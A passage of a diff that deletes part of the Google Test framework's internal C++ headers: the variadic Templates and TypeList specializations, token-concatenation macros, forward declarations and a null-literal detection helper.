-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates38<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates39<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates40<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates41<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates42<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates43<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates44<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates45<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, T46, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates46<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, T46, T47, NoneT, NoneT, NoneT> {
-  typedef Templates47<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46, T47> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, T46, T47, T48, NoneT, NoneT> {
-  typedef Templates48<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46, T47, T48> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48,
-    GTEST_TEMPLATE_ T49>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, T46, T47, T48, T49, NoneT> {
-  typedef Templates49<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46, T47, T48, T49> type;
-};
-
-// The TypeList template makes it possible to use either a single type
-// or a Types<...> list in TYPED_TEST_CASE() and
-// INSTANTIATE_TYPED_TEST_CASE_P().
-
-template <typename T>
-struct TypeList {
-  typedef Types1<T> type;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49, typename T50>
-struct TypeList<Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47, T48, T49, T50> > {
-  typedef typename Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47, T48, T49, T50>::type type;
-};
-
-#endif  // GTEST_HAS_TYPED_TEST || GTEST_HAS_TYPED_TEST_P
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TYPE_UTIL_H_
-
-// Due to C++ preprocessor weirdness, we need double indirection to
-// concatenate two tokens when one of them is __LINE__.  Writing
-//
-//   foo ## __LINE__
-//
-// will result in the token foo__LINE__, instead of foo followed by
-// the current line number.  For more details, see
-// http://www.parashift.com/c++-faq-lite/misc-technical-issues.html#faq-39.6
-#define GTEST_CONCAT_TOKEN_(foo, bar) GTEST_CONCAT_TOKEN_IMPL_(foo, bar)
-#define GTEST_CONCAT_TOKEN_IMPL_(foo, bar) foo ## bar
-
-class ProtocolMessage;
-namespace proto2 { class Message; }
-
-namespace testing {
-
-// Forward declarations.
-
-class AssertionResult;                 // Result of an assertion.
-class Message;                         // Represents a failure message.
-class Test;                            // Represents a test.
-class TestInfo;                        // Information about a test.
-class TestPartResult;                  // Result of a test part.
-class UnitTest;                        // A collection of test cases.
-
-template <typename T>
-::std::string PrintToString(const T& value);
-
-namespace internal {
-
-struct TraceInfo;                      // Information about a trace point.
-class ScopedTrace;                     // Implements scoped trace.
-class TestInfoImpl;                    // Opaque implementation of TestInfo
-class UnitTestImpl;                    // Opaque implementation of UnitTest
-
-// How many times InitGoogleTest() has been called.
-GTEST_API_ extern int g_init_gtest_count;
-
-// The text used in failure messages to indicate the start of the
-// stack trace.
-GTEST_API_ extern const char kStackTraceMarker[];
-
-// Two overloaded helpers for checking at compile time whether an
-// expression is a null pointer literal (i.e. NULL or any 0-valued
-// compile-time integral constant).  Their return values have
-// different sizes, so we can use sizeof() to test which version is
-// picked by the compiler.  These helpers have no implementations, as
-// we only need their signatures.
-//
-// Given IsNullLiteralHelper(x), the compiler will pick the first
-// version if x can be implicitly converted to Secret*, and pick the
-// second version otherwise.  Since Secret is a secret and incomplete
-// type, the only expression a user can write that has type Secret* is
-// a null pointer literal.  Therefore, we know that x is a null
-// pointer literal if and only if the first version is picked by the
-// compiler.
-char IsNullLiteralHelper(Secret* p);
-char (&IsNullLiteralHelper(...))[2];  // NOLINT
-
-// A compile-time bool constant that is true if and only if x is a
-// null pointer literal (i.e. NULL or any 0-valued compile-time
-// integral constant).
-#ifdef GTEST_ELLIPSIS_NEEDS_POD_
-// We lose support for NULL detection where the compiler doesn't like
-// passing non-POD classes through ellipsis (...).
-# define GTEST_IS_NULL_LITERAL_(x) false
-#else
-# define GTEST_IS_NULL_LITERAL_(x) \
-    (sizeof(::testing::internal::IsNullLiteralHelper(x)) == 1)
-#endif  // GTEST_ELLIPSIS_NEEDS_POD_
-
-// Appends the user-supplied message to the Google-Test-generated message.
-GTEST_API_ std::string AppendUserMessage(
-    const std::string& gtest_msg, const Message& user_msg);
-
-#if GTEST_HAS_EXCEPTIONS
-
-// This exception is thrown by (and only by) a failed Google Test
-// assertion when GTEST_FLAG(throw_on_failure) is true (if exceptions
-// are enabled).  We derive it from std::runtime_error, which is for
-// errors presumably detectable only at run time.  Since
-// std::runtime_error inherits from std::exception, many testing
-// frameworks know how to extract and print the message inside it.
-class GTEST_API_ GoogleTestFailureException : public ::std::runtime_error {
- public:
